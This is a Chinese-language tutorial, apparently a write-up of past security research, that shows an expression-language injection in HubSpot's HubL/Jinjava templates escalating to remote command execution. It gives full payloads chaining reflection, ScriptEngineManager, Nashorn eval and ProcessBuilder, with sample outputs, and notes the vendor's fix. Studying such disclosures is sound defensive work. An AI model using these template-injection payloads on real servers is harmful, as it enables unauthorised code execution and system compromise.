HubL表达式语言注入漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
本教学文档详细分析HubL（HubSpot模板语言）中的表达式语言(EL)注入漏洞，该漏洞最终可导致远程代码执行(RCE)。漏洞存在于HubSpot CRM的模板和自定义模块功能中，允许攻击者通过精心构造的HubL表达式在服务器端执行任意Java代码。<\/p>

基础知识<\/h2>

HubL语言简介<\/h3>

HubL是HubSpot基于Jinja开发的模板语言，使用三种分隔符：<\/p>

{% %}<\/code> - 语句分隔符：用于创建可编辑模块、定义条件逻辑、设置循环、声明变量等<\/li>
{{ }}<\/code> - 表达式分隔符：其中的内容会被模板引擎解析并执行<\/li>

{# #}<\/code> - 注释分隔符：其中的内容会被忽略<\/li>
<\/ol>
关键特性<\/h3>

支持内置变量如{{ account }}<\/code>、{{ company_domain }}<\/code>、{{ content }}<\/code>等<\/li>
允许用户声明自定义变量并在表达式中使用<\/li>
底层基于Java实现，可调用Java对象的方法<\/li>
<\/ul>
漏洞发现过程<\/h2>
初步探测<\/h3>

使用简单表达式测试：{{7 * 7}}<\/code>返回49<\/code>，确认表达式被执行<\/li>
尝试识别模板引擎类型，但未匹配已知模式<\/li>
发现未记录的request<\/code>变量：{{request}}<\/code>返回com.hubspot.content.hubl.context.TemplateContextRequest@23548206<\/code><\/li>
<\/ol>
Java环境确认<\/h3>

字符串操作测试：

{{'a'.toUpperCase()}}<\/code> → A<\/code><\/li>
{{'a'.concat('b')}}<\/code> → ab<\/code><\/li>
<\/ul>
<\/li>
获取类信息：

{{'a'.getClass()}}<\/code> → java.lang.String<\/code><\/li>
{{request.getClass()}}<\/code> → class com.hubspot.content.hubl.context.TemplateContextRequest<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
深入探索<\/h3>

获取类方法：

{{request.getClass().getDeclaredMethods()[0]}}<\/code> → public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()<\/code><\/li>
<\/ul>
<\/li>
调用方法：

{{request.isDebug()}}<\/code> → false<\/code><\/li>
<\/ul>
<\/li>
实例化其他类：

{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}<\/code> → sun.misc.Launcher@715537d4<\/code><\/li>
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}<\/code> → com.hubspot.jinjava.JinjavaConfig@78a56797<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用技术<\/h2>
初始RCE尝试<\/h3>
尝试直接实例化Runtime<\/code>类失败：<\/p>
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>).<\/span>newInstance<\/span>()}}<\/span>
<\/span><\/span><\/code><\/pre>返回错误：IllegalAccessException<\/code>，因为Runtime构造方法是私有的<\/p>
替代方案探索<\/h3>

尝试System<\/code>类同样失败<\/li>
发现javax.script.ScriptEngineManager<\/code>可用：
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>'<\/span>).<\/span>newInstance<\/span>()}}<\/span>
<\/span><\/span><\/code><\/pre>成功返回：javax.script.ScriptEngineManager@727c1a89<\/code><\/li>
<\/ol>
JavaScript引擎利用<\/h3>


获取JavaScript引擎：<\/p>
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>'<\/span>).<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>'<\/span>JavaScript'<\/span>)}}<\/span>
<\/span><\/span><\/code><\/pre>返回：jdk.nashorn.api.scripting.NashornScriptEngine@7f97607a<\/code><\/p>
<\/li>

执行简单eval测试：<\/p>
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>'<\/span>).<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>'<\/span>JavaScript'<\/span>).<\/span>eval<\/span>(<\/span>"new java.lang.String('xxx')"<\/span>)}}<\/span>
<\/span><\/span><\/code><\/pre>成功返回：xxx<\/code><\/p>
<\/li>
<\/ol>
实现命令执行<\/h3>


基本命令执行：<\/p>
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>'<\/span>).<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>'<\/span>JavaScript'<\/span>).<\/span>eval<\/span>(<\/span>"var x=new java.lang.ProcessBuilder; x.command(\"whoami\"); x.start()"<\/span>)}}<\/span>
<\/span><\/span><\/code><\/pre>返回进程对象：java.lang.UNIXProcess@1e5f456e<\/code><\/p>
<\/li>

获取命令输出：

使用org.apache.commons.io.IOUtils<\/code>读取命令输出：<\/p>
{{<\/span>'a'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>'<\/span>).<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>'<\/span>JavaScript'<\/span>).<\/span>eval<\/span>(<\/span>"var x=new java.lang.ProcessBuilder; x.command(\"uname\",\"-a\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())"<\/span>)}}<\/span>
<\/span><\/span><\/code><\/pre>返回系统信息：Linux bumpy-puma 4.9.62-hs4.el6.x86_64...<\/code><\/p>
<\/li>
<\/ol>
完整利用链<\/h2>

通过getClass()<\/code>方法获取String类<\/li>
使用forName()<\/code>加载ScriptEngineManager<\/code>类<\/li>
实例化ScriptEngineManager<\/code><\/li>
获取JavaScript引擎<\/li>
使用eval()<\/code>执行JavaScript代码<\/li>
在JavaScript中创建ProcessBuilder<\/code>对象<\/li>
设置要执行的命令<\/li>
使用IOUtils.toString()<\/code>获取命令输出<\/li>
<\/ol>
防御措施<\/h2>
HubSpot通过以下方式修复了该漏洞：<\/p>

禁用变量上的getClass<\/code>方法<\/li>
限制敏感类的实例化和方法调用<\/li>
<\/ul>
学习要点<\/h2>

表达式语言注入可能导致严重的RCE漏洞<\/li>
即使直接访问受限(如Runtime类)，也可能存在替代利用路径<\/li>
Java环境提供了多种实现RCE的方式<\/li>
漏洞研究需要深入了解目标技术栈和不断尝试的精神<\/li>
<\/ol>
参考资源<\/h2>

Jinjava项目源代码<\/li>
Java反射机制文档<\/li>
ScriptEngineManager API文档<\/li>
相关安全研究文章(见原文链接)<\/li>
<\/ol>

HubL表达式语言注入漏洞分析与利用教学<\/h1>

基础知识<\/h2>

漏洞发现过程<\/h2>

漏洞利用技术<\/h2>

参考资源<\/h2> Jinjava项目源代码<\/li> Java反射机制文档<\/li> ScriptEngineManager API文档<\/li> 相关安全研究文章(见原文链接)<\/li> <\/ol>

参考资源<\/h2>

Jinjava项目源代码<\/li>
Java反射机制文档<\/li>
ScriptEngineManager API文档<\/li>
相关安全研究文章(见原文链接)<\/li> <\/ol>